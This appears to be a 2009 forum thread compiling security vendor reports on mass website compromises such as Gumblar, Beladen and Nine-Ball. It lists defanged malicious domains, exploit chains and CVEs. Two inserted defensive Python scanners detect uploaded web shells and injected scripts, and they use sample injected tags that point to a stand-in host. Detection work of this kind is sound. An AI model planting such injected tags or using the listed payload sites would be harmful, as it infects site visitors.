06.04.2009 - "... the payload site for the mass compromise known as Beladen, has changed from Beladen to Shkarkimi. The new site is hosted on the same IP address as Beladen and the exploits it serves are the same. The obfuscated typosquatting domain of Google-Analytics leading to the exploit site Shkarkimi is still massively injected. We can confirm that, as of the time of writing, around 30,000 Web Sites are injected with code that eventually leads to Shkarkimi. For more details about this attack, please see our blog on Beladen*..."
* http://securitylabs.websense.com/content/Blogs/3408.aspx
... shkarkimi has a very similar network topology to Beladen. Yesterday, Google Security Team posted a list of the top ten malware domains which included googleanalystlcs.net [ note the typosquat ] as one of the top 10 malware sites**..."
** http://googleonlinesecurity.blogspot.com/2009/06/top-10-malware-sites.html

(Screenshots available at the first URL above.)


2009-06-07, 12:09

- http://blog.trendmicro.com/another-wave-of-mass-compromises-serve-info-stealers/
June 6, 2009 - "Aside from Gumblar, another incident of mass compromised web sites has been seen in the wild lately, and has raised as much concern as the former. This one starts with the same technique: a malicious IFRAME unknowingly embedded in a legitimate website, injected via JavaScript. The said IFRAME redirects to another IFRAME, which in turn executes obfuscated JavaScript code. Once decoded, it tries to connect to URLs to download exploits for several vulnerabilities in order to gain access to the affected user’s system. The obfuscated malicious JavaScript is detected as JS_DROPPER.LOK while the URLs that trigger the download of the exploits are detected as TROJ_SHELLCOD.HT. Upon successful exploitation, other malicious files are then downloaded, which Trend Micro detects as TROJ_MEDPINCH.B, and TROJ_MEDPINCH.A. TROJ_MEDPINCH.B connects to other URLs to download info-stealers SPYW_IEWATCHER and TSPY_LDPINCH.CBS. On the other hand, TROJ_MEDPINCH.A drops yet another info-stealer: TSPY_LDPINCH.ASG. TSPY_LDPINCH.ASG steals user names, passwords, and other account and installation information of the following applications:
• Microsoft Outlook
• Mirabilis ICQ
• Opera Software
• The Bat!
• Total Commander
• Trillian
Though this compromise occurs within close proximity days after Gumblar’s last attack, no mention of the Gumblar.{BLOCKED} domain appears in the code. This attack may indeed be a separate one from Gumblar, or possibly be inspired by it. Related URLs are already blocked by the Smart Protection Network, but it is highly advised that users patch their systems to minimize the chances of exploit through the following updates:
* Vulnerability in Windows Explorer Could Allow Remote Execution MS06-057
- http://www.microsoft.com/technet/security/bulletin/ms06-057.mspx
* Buffer overflow in Apple QuickTime 7.1.3
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0015
* Buffer overflow in the WZFILEVIEW.FileViewCtrl.61 ActiveX control
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6884
* Vulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution - MS06-014
- http://www.microsoft.com/technet/security/Bulletin/MS06-014.mspx
* Microsoft Internet Explorer 7 Memory Corruption Exploit - MS09-002
- http://www.microsoft.com/technet/security/bulletin/MS09-002.mspx "


2009-06-08, 21:08

- http://www.securityfocus.com/brief/970
2009-06-08 - "The drive-by-download threat, Gumblar, continues to cause widespread infection, though the number of Web sites compromised with the malicious code appears to have declined since late May, according to Web security firm Websense. The multi-stage threat, which first compromises Web sites to install malicious code that is then used to infect visitors' PCs, rocketed eight-fold in mid-May, according to an update posted to Websense's research blog on Friday*. Attackers use stolen FTP credentials to embed the first stage of the attack on legitimate Web sites. Gary Warner, a professor of digital forensics at the University of Alabama, documented an investigation he and his students performed on a compromised Facebook group. The group, which boasted 40,000 members, contained a link to a malicious site that attempted to infect visitors with Gumblar... A malicious PDF file uploaded to victims' systems by Gumblar contains the phrase, "Boris likes horilka," according to Warner's blog**. Horilka is the Ukrainian word for vodka. The software steals FTP credentials, sends spam, installs fake antivirus software, hijacks Google search queries, and disables security software."
* http://securitylabs.websense.com/content/Blogs/3414.aspx
** http://garwarner.blogspot.com/2009/06/gumblars-48000-compromised-domains.html
June 06, 2009 - "... 48,000 compromised domains..."


2009-06-11, 12:36

- http://windowssecrets.com/comp/090611#story1
2009-06-11 - "Going by such names as Gumblar, JSRedir-R, Martuz, and Beladen, a new generation of malware has managed to surreptitiously place malicious JavaScript code on tens of thousands of popular Web sites. The hacker scripts try to infect site visitors and then attempt to use their compromised PCs to spread the infection to yet other sites. Over the past month, the security services ScanSafe* and Sophos** have reported infections on such major Web sites as ColdwellBanker.com, Variety.com, and Tennis.com. Niels Provos reported in the Google security blog*** on June 3 that sites infected with Gumblar numbered about 60,000. Visitors became susceptible to infection simply by opening the sites in Internet Explorer..."
* http://blog.scansafe.com/journal/2009/5/8/google-serps-redirections-turn-to-bots.html
May 8, 2009

** http://www.sophos.com/blogs/gc/g/2009/05/14/malicious-jsredir-javascript-biggest-malware-threat-web/
May 14th, 2009

*** http://googleonlinesecurity.blogspot.com/2009/06/top-10-malware-sites.html
June 3, 2009 - "... malware researchers reported widespread compromises pointing to the domains gumblar .cn and martuz .cn, both of which made it on our top-10 list. For gumblar, we saw about 60,000 compromised sites; Martuz peaked at slightly over 35,000 sites. Beladen .net was also reported to be part of a mass compromise, but made it only to position 124 on the list with about 3,500 compromised sites..."

- http://blog.trendmicro.com/stolen-ftp-credentials-key-to-gumblar-attack/
June 10, 2009 - "Analysts of the recent Gumblar attack that compromised thousands of legitimate websites stated that the unauthorized modifications in the websites were possibly executed not only through SQL injection. The compromise was also reportedly done through accessing web server files through stolen FTP credentials gathered by one of the final malware payloads of the same attack. The infection chain initiated by the malicious scripts HTML_JSREDIR.AE and HTML_REDIR.AC ends with the download of TSPY_KATES.G into the affected system. The data-stealer, TSPY_KATES.G, installs itself as a driver on the affected system and monitors network traffic. It also steals FTP account information, which includes user names and passwords. Analysts believe that through TSPY_KATES.G Gumblar was able to compromise more sites than when it initially launched the attack. SQL injections only work under certain conditions (if the website is vulnerable enough to allow such injections), and give cybercriminals limited access to the targeted webpage. Obtaining FTP credentials, however, grants the cybercriminals the same level of access as the website administrator has, regardless of any security measures used..."


2009-06-16, 22:15

Nine-Ball - mass injection, malicious site, malicious code
- http://securitylabs.websense.com/content/Alerts/3421.aspx
06.16.2009 - "Websense... has detected another large mass injection attack in the wild after the Beladen and Gumblar attacks. We are calling this mass compromise Nine-Ball because of the final landing site. We have been tracking the Nine-Ball mass compromise since 6/03/2009. To date, over 40,000 legitimate Web sites have been compromised with obfuscated code that leads to a multi-level redirection attack, ending in a series of drive-by exploits that, if successful, install a trojan downloader on the user's machine... If a user visits one of the infected sites, they are redirected through a series of different sites owned by the attacker and brought to the final landing page containing the exploit code (the redirection path is shown below). The final landing page records the visitor's IP address. When visited for the first time, the user is directed to the exploit payload site. But when visited again from the same IP address, the user is directed to the benign site of ask.com... After redirection, the exploit payload site returns highly obfuscated malicious code. The malicious code attempts to exploit MS06-014 (targeting MDAC) and CVE-2006-5820 (targeting AOL SuperBuddy), as well as employing exploits targeting Acrobat Reader and QuickTime. The MS06-014 exploit code will download a Trojan dropper with a low AV detection rate*. This dropper drops a dll with the name SOCKET2.DLL to Windows' system folder. This file is used to steal user information. The malicious PDF file, served by the exploit site, also has a very low AV detection rate**..."
* http://www.virustotal.com/analisis/62254bf6a13a438bc53c0f3745c622c5c1604aa37e4f866036a1e94c35cc68f7-1245137075
File l.php ... Result: 7/40 (17.50%)

** http://www.virustotal.com/analisis/f9565077d685764b9e219358d4a64e2165fd8ac157fa46c955a5e35112aad894-1245160253
File PDF.php ... Result: 3/41 (7.32%)

(Screenshot available at the Websense URL above.)


2009-06-18, 03:33

- http://preview.tinyurl.com/nz8pu2
2009-06-17 E-week.com - "... "We are not releasing the names of the sites compromised," said Stephan Chenette, manager of threat research at Websense. "We've attempted to contact a subset of the compromised sites to let them know that they've been infected … No particular vertical was targeted"... in a bid to sniff out security researchers, the compromised sites are set to check if they have been visited more than once by the same IP address. If a visitor has been to the site more than once, he or she will be directed to ask.com instead of to the attack site. While Nine-Ball is the third mass Website compromise report to make headlines in recent weeks, Chenette said it appears to be distinct from the others. "The Nine-Ball mass compromise is not related to either Beladen or Gumblar, but like the previous mass compromises, many of the machines owned by the attacker are located in the Ukraine," Chenette said..."


2009-06-22, 23:47

- http://securitylabs.websense.com/content/Blogs/3422.aspx
06.22.2009 - "... Nine-Ball attack compromised over 40,000 legitimate Web sites in an ongoing campaign... By analyzing the tens of thousands of Web sites compromised in this attack we can see that the majority of infected sites are in the United States (71%)... A confusing factor for most who attempt to analyze this attack is that there is no clear single malicious redirection path. Users who visit an infected site are silently taken through a series of varied redirectors and the final landing page is not always the same... The valid string, in the Nine-Ball attacks, is an iframe. When this iframe is interpreted by the browser, the browser silently visits the iframe location... Once exposed to a Nine-Ball exploit site, several exploits will be delivered to the user's browser. Among them are:
• MS06-014 (MDAC)
• CVE-2006-5820 (AOL SuperBuddy)
• CVE-2007-0015 (QuickTime)
• Adobe Acrobat Reader
The exploit code that targets Acrobat Reader will download a malicious PDF file from the exploit site. The PDF file integrates 3 vulnerabilities:
• CVE-2008-1104
• CVE-2007-5659
• CVE-2009-0927 ..."

(Screenshots available at the URL above.)


2009-06-25, 12:55
More on Nine-ball...

- http://blog.trendmicro.com/another-messy-mass-compromise-emerges/
June 22, 2009 - "... Trend Micro was alerted of the emergence of another mass compromise, dubbed Nine Ball, for the same reason Gumblar was named Gumblar, only that this time, the Nine Ball domain is only one of hundreds of landing pages users can be redirected to... the infection starts when a user accesses a compromised site that automatically redirects him/her to several sites. These sites were actually a trio of malicious domains (specific .KZ and .TW sites) constantly used by attackers in their scheme of redirecting users to a malicious IP address registered somewhere in Ukraine. The chain ends when the user's browser lands on a page that contains exploits for vulnerabilities in various software including Adobe Acrobat, Adobe Shockwave... Both PDF and SWF files lead to a binary payload that looks similar to a new kind of information stealer detected as TSPY_SILENTBAN.U. TSPY_SILENTBAN.U installs itself as a Browser Helper Object (BHO) on the affected system and monitors Internet activity. Gathered information is then sent to a remote user using HTTP POST. Note that as of this writing, the binary payload retrieved from the attack uses this spyware. It is more likely that in future attacks, other payloads can be used... Information on the vulnerabilities exploited in this attack can be found on the following pages:
Last revised: 04/28/2009
Last revised: 11/25/2008
Last revised: 11/15/2008 ..."


2009-07-03, 13:47

Cold Fusion sites compromised
- http://isc.sans.org/diary.html?storyid=6715
Last Updated: 2009-07-03 09:35:14 UTC ...(Version: 2) - "There have been a high number of Cold Fusion web sites being compromised in the last 24 hours... It appears that the attackers are exploiting web sites which have older installations of some Cold Fusion applications. These applications have vulnerable installations of FCKEditor, which is a very popular HTML text editor, or CKFinder, which is an Ajax file manager. The vulnerable installations allow the attackers to upload ASP or Cold Fusion shells which further allow them to take complete control over the server. The attacks we've been seeing in the wild end up with inserted <script> tags in documents on compromised web sites. As you can probably guess by now, the script tags point to a whole chain of web sites which ultimately serve malware and try to exploit vulnerabilities on clients...
Update: ... It appears that there are two attack vectors (both using vulnerable FCKEditor installations though) that the attackers are exploiting. First, version 8.0.1 of Cold Fusion installs a vulnerable version of FCKEditor which is enabled by default. This is very bad news, of course, since the attacker can just directly exploit FCKEditor to upload arbitrary files on affected servers. Information on how to disable this is available on the ColdFusion web site at http://www.codfusion.com/blog/post.cfm/cf8-and-fckeditor-security-threat
The second attack vector is again through vulnerable FCKEditor installations, but which are this time dropped through a 3rd party application. One of the common applications that has been seen in attacks is CFWebstore, a popular e-commerce application for ColdFusion. Older versions of CFWebstore used vulnerable FCKEditor installations - if you are using CFWebstore make sure that you are running the latest version and that any leftovers have been removed."

- http://www.ocert.org/advisories/ocert-2009-007.html
2009-07-03 - "... A patch and a new FCKeditor version will be made available on Monday July 6th 16:00 CET, this advisory will be updated with detailed information about the issue and a security patch. In the meantime we strongly recommend to implement the following mitigation instructions:
* remove unused connectors from 'editor\filemanager\connectors'
* disable the file browser in config.ext
* inspect all fckeditor folders on the server for suspicious files that may have been previously uploaded, as an example image directories (eg. 'fckeditor/editor/images/...') are well known target locations for remote php shells with extensions that match image files
* remove the '_samples' directory
Affected version: FCKeditor <= 2.6.4
(version 3.0 is unaffected as it does not have any built-in file browser)
Fixed version: FCKeditor >= (to be released on 2009-07-06 16:00 CET) ..."

- http://www.fckeditor.net/download
Current Release -
July 6, 2009

- http://secunia.com/advisories/35712/2/
Release Date: 2009-07-07
Critical: Highly critical
Solution: Update to version

> http://www.us-cert.gov/current/index.html#fckeditor_releases_version_2_6

- http://blogs.adobe.com/psirt/2009/07/potential_coldfusion_security.html
July 3, 2009
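The oCERT mitigation above asks administrators to inspect fckeditor image directories for previously uploaded shells whose extension matches an image. The following is an added example of that check (not code from oCERT, FCKeditor or the ISC diary): it flags executable or double extensions, script markers inside the body (so a valid GIF header followed by PHP is still caught), and image extensions whose content lacks the format's header. The directory layout and sample files are constructed.

```python
"""Scan web-editor upload directories for files that are not what their
extension claims. Added example, not code from oCERT, FCKeditor or the ISC
diary; the directory layout and sample files are constructed."""
import os
import re
import shutil
import tempfile

IMAGE_EXTENSIONS = {".gif", ".jpg", ".jpeg", ".png", ".bmp"}

# Header bytes a genuine file of each image type begins with.
IMAGE_MAGIC = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".bmp": (b"BM",),
}

# Extensions the web server would hand to an interpreter. The advisory's
# scenario is a script uploaded into an image directory, possibly with a
# double extension (shell.php.gif) so that a naive filter accepts it.
EXECUTABLE_EXTENSIONS = {".php", ".php3", ".php5", ".phtml", ".asp", ".aspx",
                         ".cfm", ".cfc", ".jsp"}

# Opening markers of PHP, ASP and ColdFusion code (the shell types the ISC
# diary and oCERT text mention), searched anywhere in the body so that a
# valid image header followed by script (a polyglot) is still caught.
SCRIPT_MARKERS = re.compile(rb"<\?php|<%|<cf[a-z]+[\s>]", re.IGNORECASE)


def classify_file(name, data):
    """Return a reason string if the file looks like an uploaded shell, else None."""
    base = name.lower()
    ext = os.path.splitext(base)[1]
    # 1. An executable extension anywhere in the name (shell.php, shell.php.gif).
    for part in base.split(".")[1:]:
        if "." + part in EXECUTABLE_EXTENSIONS:
            return "executable extension in file name"
    # 2. Server-side code in the body, regardless of extension.
    if SCRIPT_MARKERS.search(data):
        return "server-side script marker in content"
    # 3. Claims to be an image but does not start like one.
    if ext in IMAGE_EXTENSIONS and not data.startswith(IMAGE_MAGIC[ext]):
        return "image extension without matching image header"
    return None


def scan_directory(root):
    """Walk an upload tree and return sorted (relative path, reason) pairs."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            with open(path, "rb") as fh:
                data = fh.read()
            reason = classify_file(fname, data)
            if reason:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings.append((rel, reason))
    return sorted(findings)


def demo():
    """Build a constructed fckeditor-style image directory, scan it and
    return the findings (the temporary tree is removed afterwards)."""
    samples = {
        "logo.gif": b"GIF89a" + b"\x00" * 16,             # genuine image
        "photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,  # genuine image
        "shell.php.gif": b"GIF89a",                        # double extension
        "img01.gif": b"GIF89a<?php /* constructed */ ?>",  # polyglot
        "banner.png": b"not an image at all",              # mislabelled
    }
    root = tempfile.mkdtemp()
    try:
        image_dir = os.path.join(root, "fckeditor", "editor", "images")
        os.makedirs(image_dir)
        for fname, content in samples.items():
            with open(os.path.join(image_dir, fname), "wb") as fh:
                fh.write(content)
        return scan_directory(root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for path, reason in demo():
        print(f"{path}: {reason}")
```

Run `scan_directory()` against the real editor tree and treat every hit as something to pull for manual review; a clean result says nothing about shells planted outside the image directories.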


2009-07-04, 00:07

Gumblar invades Best Buy
- http://blog.trendmicro.com/gumblar-invades-best-buy/
July 2, 2009 - "Earlier today, Trend Micro... spotted a (potentially harmful) URL that redirects users from the Best Buy domain site. Users who visit www.bestbuy.com, as it turns out, are redirected to the URL, hxxp ://pics. bubbled.cn/gallery/hardcore/?23c4f60c1b9f604d6ffb21cba599301f
(hxxp = http, and without the spaces). The compromised page in the domain is found to be the landing page where visitors can choose the language to be used as they browse within the site. Threat Research Manager, Ivan Macalintal, further identifies that a GEO-IP check happens prior to displaying the said landing page... The WHOIS screenshot of the .CN site states that it has been created just last June 4, 2009 by the same old criminals.
Further investigation shows that the first .CN site is actually located in Germany and is used by attackers in Ukraine. Suffice it to say, the Russkranians are the culprits once again. Best Buy has been informed of the said URL redirections and is resolving the matter as of this writing..."

(Screenshots and more detail at the TrendMicro URL above.)


2009-07-16, 12:32

(MS Office Web Components) OWC exploits used in SQL injection attacks
- http://isc.sans.org/diary.html?storyid=6811
Last Updated: 2009-07-16 08:38:21 UTC - "... The SQL injection attempt looks very much like the one we've been seeing for months – the attacker blindly tries to inject obfuscated SQL code... they are injecting a script code pointing to f1y .in, which is a known bad domain. This script contains links to two other web sites (www .jatrja.com and js.tongji. linezing .com [DO NOT VISIT]) serving malicious JavaScript that, besides exploits for some older vulnerabilities, also include the exploit for the OWC vulnerability. The exploits end up downloading a Trojan (of course, what else) which currently has pretty bad detection (VT link*) – only 15 AV programs detecting it; luckily, some major AV vendors are there. If you haven't set those killbits** yet, be sure that you do now because the number of sites exploiting this vulnerability will probably rise exponentially soon."
* http://www.virustotal.com/analisis/055757dfc4ffd9a3bc1a53fe965881dfb56268bfc7833968a1b26675376dda0a-1247733262

** http://support.microsoft.com/kb/973472#FixItForMe

- http://blog.trendmicro.com/massive-sql-injection-ensues/
July 17, 2009


2009-08-14, 14:22

Multiple JS site injections/compromises...
- http://securitylabs.websense.com/content/Blogs/3461.aspx
08.14.2009 - "Recently, since Microsoft released information about new vulnerabilities in MS Office and DirectShow in July, attacks spreading through the infection of thousands of legitimate Web sites have increased sharply in the wild... The script redirects to four malicious pages which capitalize on different vulnerabilities. The vulnerabilities they target are:
• Firefox Corrupt JIT state after deep return from native function (MFSA 2009-41);
• Microsoft DirectShow(msvidctl.dll) vulnerability (MS09-032);
• Microsoft Office Web Components Spreadsheet ActiveX vulnerability (MS09-043);
• Adobe Acrobat and Reader Collab 'getIcon()' JavaScript Method Remote Code Execution Vulnerability (CVE-2009-0927).
The third feature of the injection campaign is the constantly evolving injection codes. It seems that the attackers use a randomizer to generate this kind of JavaScript, but ultimately they all point to similar exploits... obfuscated JavaScript is the most important means of injection, taking up over 50 percent of the total. In summary, all of these injection methods are easy to implement for attackers and difficult to detect for users, meaning that more and more innocent users are involved in this injection campaign. This campaign not only targets mass college Web sites, but is also spreading widely in other sites in China. At the moment, the number of compromised college sites is still very high, maintaining a level of around 800 sites..."


2009-08-25, 00:13

SQL injection attacks hit 57K sites
- http://www.theregister.co.uk/2009/08/24/mass_web_infection/
24 August 2009 - "Malicious hackers have managed to infect about 57,000 web pages with a potent exploit cocktail that targets a variety of vulnerable applications to surreptitiously install malware on visitor machines. The exploits install an assortment of nasty software, including Gologger, a keystroke logging trojan, and a backdoor that attempts to connect to a website hosted in China, according to Mary Landesman, a researcher at ScanSafe, a company that protects end users from malicious websites. The attackers were able to plant a malicious iframe in the pages by exploiting SQL injection vulnerabilities. Once in place, the script silently pulls down javascript from a0v .org** that silently runs while people are visiting one of the infected websites... SQL injection attacks exploit weaknesses in web applications that fail to adequately scrutinize text that users enter into search boxes and other web fields. The attacks have the effect of passing powerful commands to the website's back-end database. Landesman's report is available here*."
* http://blog.scansafe.com/journal/2009/8/21/up-to-55k-compromised-by-potent-backdoordata-theft-cocktail.html
August 21, 2009

> http://www.threatexpert.com/report.aspx?md5=131098d54e4c5ffc47e577fd1b45805c
16 August 2009 - "... The following Internet Connection was established:
Server Name
qirueixzz. 3322 .org ..."

> http://www.virustotal.com/analisis/1f364808db522b7d7b07244ff8cff8bf31769de692e4bad3d5b5996b62984194-1249319276
File ae563af77535163a1562cc1106ddf342- received on 2009.08.03 17:07:56 (UTC)
Result: 6/41 (14.63%)

> http://www.virustotal.com/analisis/572da9d70ad6cc88540766b8ebaf5750ae25481f46e00264cf1d5afa0b781b12-1249741982
File mam.exe received on 2009.08.08 14:33:02 (UTC)
Result: 26/41 (63.41%)

** http://centralops.net/co/DomainDossier.aspx
Country: CN


2009-08-27, 04:12
FYI... [Please DO NOT visit these domains as they are distributing malware both through the files they are peddling and via exploits.]

Following the Injection - a0v .org
- http://securitylabs.websense.com/content/Blogs/3465.aspx
08.26.2009 - "... The site that has been injected in this campaign is a 35-day-old domain called a0v.org. The injection is in plain text, non-obfuscated script tags... There is no mercy shown with the frequency of the injections, which confirms that this injection is an automated process, as most injections are... Once a user browses to an infected Web site, the user is redirected to execute the injected script at hxxp ://a0v .org/ x.js... the first takes the user to exploit sites just down the chain, and the second takes the user to a log server established by the baddies... The next stop in the exploit chain is hxxp ://game163 .info/oday/index .html... game163.info is also a fresh domain, registered just 23 days ago. Its source goes to even further redirects in the same site. But before it decides where to go, it checks whether the user's browser is Microsoft Internet Explorer 7, using a hex-represented string for "msie 7"... Following is a summary of all the exploits used, from the last one discovered to the oldest:
• Adobe Flash, Acrobat Reader CVE-2009-1862
• Microsoft Office Web Components CVE-2009-1136
• Microsoft Internet Explorer XML Parsing CVE-2008-4844
• Microsoft DirectShow (msvidctl.dll) CVE-2008-0015 - Suspected\Disabled
• Microsoft Data Access Components (MDAC) CVE-2006-0003
The exploits are served from multiple replicated Web sites, bearing the exact same code and structure as game163 .info... The newest exploit used in the chain is Adobe Flash and Acrobat Reader CVE-2009-1862 -- alerted on at the end of July, and the most troublesome one, due to two facts:
1) Today, most users don't bother to update their versions of Flash/Acrobat.
2) We've recently received reports (in the middle of August) showing almost the same exploit code (with only minor variations in syntax) with an embedded malicious Flash file exploiting CVE-2009-1862 and holding only 2/42 and 0/42 detection rates by vendors, respectively. The results for the malicious Flash file exploiting this vulnerability in this attack are still very low, with only 5/41*, and the related exploit page with only 4/41**. Combine those two facts together, and you have a major breach that allows the attackers to do a great deal of damage. Similar mass injections happen around the clock, capitalizing on the latest exploits that rely on the two facts listed above, and holding different obfuscated source codes and payloads. Those facts can only suggest the large number of infected users from such mass compromises."
* http://www.virustotal.com/analisis/f1658c4938bb1913e92e397561116bc839cebb6d07b7f7f4d5d2df13398d0744-1251148350
File xp-swf.txt received on 2009.08.24 21:12:30 (UTC)
Result: 5/41 (12.20%)

** http://www.virustotal.com/analisis/6266e1fbe7129b05cc64963a6bb4b93b733d0f367fc0825c74560c80a7263303-1251295435
File ex1.txt received on 2009.08.26 14:03:55 (UTC)
Current status: finished
Result: 4/41 (9.76%)
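The Websense write-up above describes the a0v .org injection as plain-text, non-obfuscated script tags, while the Nine-Ball and 318x posts in this thread describe injected iframes, and the August college-site campaign describes randomized obfuscated JavaScript. As an added example (not code from Websense, ScanSafe or the ISC diary), the scanner below checks a page's HTML for the three shapes at once: external script sources and iframes pointing at hosts outside an allow-list, iframes sized or styled to be invisible, and inline scripts using the eval/unescape/fromCharCode constructs typical of the obfuscated injections. The allow-list, host names and sample page are constructed.

```python
"""Flag injected <script src> and <iframe> tags in a web page. Added example,
not code from Websense, ScanSafe or the ISC diary; the allow-list, host names
and sample HTML are constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Inline-JS constructs the obfuscated injections in the thread rely on.
OBFUSCATION = re.compile(
    r"\beval\s*\(|\bunescape\s*\(|String\.fromCharCode|document\.write\s*\(\s*unescape",
    re.IGNORECASE,
)


def _is_hidden(attrs):
    """True when an iframe is sized or styled so the visitor never sees it."""
    for dim in ("width", "height"):
        value = (attrs.get(dim) or "").strip().lower().rstrip("px")
        if value in {"0", "1"}:
            return True
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return ("display:none" in style or "visibility:hidden" in style
            or "left:-" in style or "top:-" in style)


class InjectionScanner(HTMLParser):
    """Collect (kind, host, detail) findings for a page."""

    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed_hosts = {h.lower() for h in allowed_hosts}
        self.findings = []
        self._in_script = False
        self._script_buf = []

    def _external_host(self, url):
        # Relative URLs have no host; scheme-relative (//host/x.js) and absolute
        # URLs do. Return the host only when it is outside the allow-list.
        host = urlsplit(url.strip()).hostname
        if host is None or host.lower() in self.allowed_hosts:
            return None
        return host.lower()

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
            self._script_buf = []
            src = a.get("src")
            host = self._external_host(src) if src else None
            if host:
                self.findings.append(("external script", host, src))
        elif tag == "iframe":
            src = a.get("src") or ""
            host = self._external_host(src)
            hidden = _is_hidden(a)
            if host and hidden:
                self.findings.append(("hidden external iframe", host, src))
            elif host:
                self.findings.append(("external iframe", host, src))
            elif hidden:
                self.findings.append(("hidden iframe", None, src))

    def handle_data(self, data):
        if self._in_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
            body = "".join(self._script_buf).strip()
            if body and OBFUSCATION.search(body):
                self.findings.append(("obfuscated inline script", None, body[:60]))


def scan_html(html, allowed_hosts):
    """Return the list of findings for one page's HTML."""
    scanner = InjectionScanner(allowed_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: the site's own hosts plus one injected host.
ALLOWED_HOSTS = {"www.example.com", "cdn.example.com"}
SAMPLE_HTML = """<html><head>
<script src="/js/site.js"></script>
<script src="http://cdn.example.com/lib.js"></script>
<script src="http://injected-host.invalid/x.js"></script>
</head><body>
<p>Welcome</p>
<iframe src="http://injected-host.invalid/index.html" width="0" height="0"></iframe>
<iframe src="http://www.example.com/video" width="400" height="300"></iframe>
<script>document.write(unescape("%3C%69%66%72%61%6D%65"));</script>
</body></html>"""

if __name__ == "__main__":
    for kind, host, detail in scan_html(SAMPLE_HTML, ALLOWED_HOSTS):
        print(f"{kind}: host={host} detail={detail}")
```

Because the injected tags in these campaigns are appended to every page on a site, a hit on a few sampled pages is usually enough to confirm a compromise; a clean allow-list result is only as good as the list of hosts the site legitimately loads from.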


2009-08-28, 17:26

Another mass compromise attack
- http://blog.trendmicro.com/bkdr_refpron-in-new-mass-compromise/
Aug. 28, 2009 - "Trend Micro threat analysts were alerted to another mass compromise attack affecting around 55,000 consumer-oriented sites spread throughout Canada, China, the United Kingdom, and India as of the first report. This incident is a painful reminder of the persisting risk of unprotected Web-surfing. In this particular case, the malicious scripts injected in the legitimate sites lead to other sites that eventually resolve to the download of the following backdoor programs and components:
• axa0727.exe-1 (BKDR_REFPRON.FH)
• d.binaxa072776988 (TROJ_REFPRON.FI)
• ms.binaxa0727588773 (TROJ_REFPRON.FJ)
• so.binaxa0727737721 (BKDR_REFPRON.FH)
The backdoors drop other components and connect to other IP addresses to download other malware, further increasing the risk for users... As of this writing, searching for the offending script yields 99,000 results."


2009-09-15, 17:27

2009 - Top Cyber Security Risks
- http://www.sans.org/top-cyber-security-risks/
September 2009 - "Two risks dwarf all others, but organizations fail to mitigate them... attack data from TippingPoint intrusion prevention systems protecting 6,000 organizations, vulnerability data from 9,000,000 systems compiled by Qualys, and additional analysis... current data - covering March 2009 to August 2009 - from appliances and software in thousands of targeted organizations to provide a reliable portrait of the attacks being launched and the vulnerabilities they exploit...
Executive Summary
Priority One: Client-side software that remains unpatched.
Waves of targeted email attacks, often called spear phishing, are exploiting client-side vulnerabilities in commonly used programs such as Adobe PDF Reader, QuickTime, Adobe Flash and Microsoft Office. This is currently the primary initial infection vector used to compromise computers that have Internet access. Those same client-side vulnerabilities are exploited by attackers when users visit infected web sites...
Priority Two: Internet-facing web sites that are vulnerable.
Attacks against web applications constitute more than 60% of the total attack attempts observed on the Internet. These vulnerabilities are being exploited widely to convert trusted web sites into malicious websites serving content that contains client-side exploits. Web application vulnerabilities such as SQL injection and Cross-Site Scripting flaws in open-source as well as custom-built applications account for more than 80% of the vulnerabilities being discovered. Despite the enormous number of attacks and despite widespread publicity about these vulnerabilities, most web site owners fail to scan effectively for the common flaws and become unwitting tools used by criminals to infect the visitors that trusted those sites to provide a safe web experience..."
(Charts available at the URL above.)

- http://securitylabs.websense.com/content/Blogs/3476.aspx
09.15.2009 - "... Websense Security Labs identified a 233 percent growth in the number of malicious sites in the last six months and a 671 percent growth over the last year..."


2009-10-21, 11:30

Gumblar attacks surge again
- http://www.pcworld.com/businesscenter/article/173954/researchers_see_gumblar_attacks_surge_again.html
October 20, 2009 - "... In May, thousands of Web sites were found to have been hacked to serve up an iframe, which is a way to bring content from one Web site into another. The iframe led to the "gumblar.cn" domain. Gumblar would then try to exploit the user's PC via software vulnerabilities in Adobe Systems products such as Flash or Reader and then deliver malicious code. Gumblar has also now changed its tactics. Rather than hosting the malicious payload on a remote server, the hackers are now putting that code on compromised Web sites, vendors IBM and ScanSafe say. It also appears Gumblar has been updated to use one of the more recent vulnerabilities in Adobe's Reader and Acrobat programs, according to IBM's Internet Security Systems Frequency X blog*. The hackers know that it's only a matter of time before a malicious domain is shut down by an ISP. The new tactic, however, "gives them a decentralized and redundant attack vector, spread across thousands of legitimate websites around the world," IBM said... The hackers behind Gumblar have also taken to forcibly injecting a malicious iframe into forums, according to a blog post from ScanSafe***. It means that people become victim to a so-called drive-by attack, where they are instantly exposed to malicious content from elsewhere when visiting a legitimate site..."
* http://blogs.iss.net/archive/GumblarReloaded.html
October 19, 2009 - "... Coverage for the updated Trojan is still very low according to an analysis done through VirusTotal**..."
** http://www.virustotal.com/analisis/b6d5386298ec44cf220b1768a9fdc3b0a6d38f078d233c9d8edf761fe9589362-1255712244
File 1952405D00EE6FBD3E0000E9F4250F00643110CC.exe received on 2009.10.16 16:57:24 (UTC)
Result: 6/41 (14.63%)

*** http://blog.scansafe.com/journal/2009/10/15/gumblar-website-botnet-awakes.html
October 15, 2009

- http://google.com/safebrowsing/diagnostic?site=gumblar.cn/
"... last time suspicious content was found on this site was on 2009-10-22... this site has hosted malicious software over the past 90 days. It infected 6674 domain(s)..."
"... last time suspicious content was found on this site was on 2009-10-26... this site has hosted malicious software over the past 90 days. It infected 6381 domain(s)..."


2009-10-28, 10:25

